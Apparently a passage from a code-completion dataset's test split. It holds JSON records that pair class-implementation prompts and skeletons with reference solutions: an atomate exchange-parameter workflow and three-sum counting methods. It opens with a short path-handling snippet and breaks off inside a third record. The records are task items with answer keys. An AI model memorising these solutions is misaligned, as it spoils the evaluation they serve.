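    """Sketch of the apparent intent: double the slashes, but keep the result."""
    if os.path.exists(edit_path):
        # str.replace returns a new string; the record's version never assigns
        # it back, so the replacement silently vanished. This sketch assigns it.
        edit_path = edit_path.replace('/', '//')
    return edit_path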
reverse=False)]\nordered_energies = sorted(energies, reverse=False)\nself.structures = ordered_structures\nself.energies = ordered_energies\nfor s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")", "c = c or {'DB_FILE': DB_FILE}\nif 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\nheisenberg_settings = c.get('heisenberg_settings', {})\nfws = []\nheisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\nmc_settings = c.get('mc_settings', {})\nvampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\nfws = [heisenberg_model_fw, vampire_fw]\nwf = Workflow(fws)\nwf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\nformula = self.structures[0].composition.reduced_formula\nwf.name = f'{formula} - Exchange'\nreturn wf"], "bodies_text": "<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ExchangeWF", "detected_licenses": ["LicenseRef-scancode-hdf5", "LicenseRef-scancode-generic-cla", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. 
default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000188", "length_bytes": 4841, "license_type": "permissive", "methods": [{"docstring": "Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these", "name": "__init__", "signature": "def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF')"}, {"docstring": "Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. 
tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise", "name": "get_wf", "signature": "def get_wf(self, num_orderings_hard_limit=16, c=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005438", "prompt": "Implement the Python class `ExchangeWF` described below.\n\nClass description:\nImplement the ExchangeWF class.\n\nMethod signatures and docstrings:\n- def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'): Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\n- def get_wf(self, num_orderings_hard_limit=16, c=None): Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise", "prompted_full_text": "Implement the Python class `ExchangeWF` described below.\n\nClass description:\nImplement the ExchangeWF class.\n\nMethod signatures and docstrings:\n- def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'): Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\n- def get_wf(self, num_orderings_hard_limit=16, c=None): Retrieve Fireworks workflow. 
c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\n\n<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. 
Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "revision_id": "f4060e55ae3a22289fde9516ff0e8e4ac1d22190", "skeleton": "<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. 
Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExchangeWF:\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. 
Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n", "source": "the_stack_v2_python_sparse", "source_path": "atomate/vasp/workflows/base/exchange.py", "source_repo": "hackingmaterials/atomate", "split": "test", "star_events_count": 217} {"blob_id": "d8511d383996cf7221d95f5083db567872bd5bf4", "bodies": ["n = len(arr)\nans = 0\nMOD = 10 ** 9 + 7\nm = {}\nfor i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\nreturn ans % MOD", "n = len(arr)\narr.sort()\nans = 0\nMOD = 10 ** 9 + 7\nfor i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\nreturn ans % MOD", "n = len(arr)\nans = 0\nMOD = 10 ** 9 + 7\ncount = [0] * 101\nfor a in arr:\n count[a] += 1\nfor i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\nreturn ans % MOD"], "bodies_text": "<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n 
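[Editor's aside] The `get_wf` body in the ExchangeWF record above opens with a common optional-config idiom: `c = c or {...}` substitutes a default dict when `c` is None (or empty, since an empty dict is falsy), and a follow-up membership test backfills individual keys. A standalone sketch of that pattern; `DEFAULTS` and the helper name are illustrative, not taken from the record:

DEFAULTS = {'DB_FILE': 'db.json', 'heisenberg_settings': {}, 'mc_settings': {}}

def merge_config(c=None):
    """Return a config dict where keys the caller omitted fall back to DEFAULTS."""
    c = dict(c or {})                 # copy, so the caller's dict is not mutated
    for key, value in DEFAULTS.items():
        c.setdefault(key, value)      # fill in only the missing keys
    return c

assert merge_config() == DEFAULTS
assert merge_config({'DB_FILE': '/tmp/db.json'})['mc_settings'] == {}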
for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000189", "length_bytes": 3256, "license_type": "no_license", "methods": [{"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMulti", "signature": "def threeSumMulti(self, arr, target)"}, {"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMultiTwoPointers", "signature": "def threeSumMultiTwoPointers(self, arr, target)"}, {"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMultiUsingCombination", "signature": "def threeSumMultiUsingCombination(self, arr, target)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000783", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def threeSumMulti(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiTwoPointers(self, arr, target): :type arr: List[int] :type target: 
int :rtype: int\n- def threeSumMultiUsingCombination(self, arr, target): :type arr: List[int] :type target: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def threeSumMulti(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiTwoPointers(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiUsingCombination(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "revision_id": "810575368ecffa97677bdb51744d1f716140bbb1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int 
:rtype: int\"\"\"\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n", "source": "the_stack_v2_python_sparse", "source_path": "3/3SumWithMultiplicity.py", "source_repo": "bssrdf/pyleet", "split": "test", "star_events_count": 2} {"blob_id": "9007d7bb2d213ebcca64a38448d8c789a906bd3c", "bodies": ["self.positions = positions\nself.position_vals = []\nself.num_trials = num_trials\ntry:\n self.num_trials = int(num_trials)\nexcept:\n raise TypeError\nelse:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)", "num_shares = 1000 / pos_val\nn = 0\nsum = 0\nwhile n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\nreturn sum", "position = 1000 / pos_val\ndaily_ret = []\nn = 0\nwhile n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\nreturn daily_ret"], "bodies_text": "<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x 